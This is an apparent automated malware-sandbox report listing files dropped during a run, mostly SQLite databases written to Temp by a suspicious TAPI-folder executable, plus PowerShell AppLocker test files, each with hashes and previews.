                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ZRKAeTJVmm

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ZUMcjGg3t4

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Zf5HA5nVJk

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jiog0zt.342.ps1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ln2wo5x.ugn.psm1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2llftysr.nje.ps1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rjiwo0v.n5q.psm1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wzosq34.mvi.ps1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1qm05bb.dko.ps1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d4h4u4yl.e1h.ps1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hogdj0bt.1hq.ps1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hysi00xy.itr.psm1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu0hxlap.puc.psm1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjflhmbz.f20.ps1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3o0hwtw.qdo.psm1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogdj13rz.s2m.psm1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qf40xxpe.2go.psm1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rscqeapy.rdr.psm1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ru1r135a.hwv.ps1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmahfl4v.tcx.psm1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wr2xyi4i.nns.ps1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xazf2lrz.5g1.psm1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmxiwgsl.iwk.ps1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\aI3AjpE1mf

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\akFnWz0stC

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
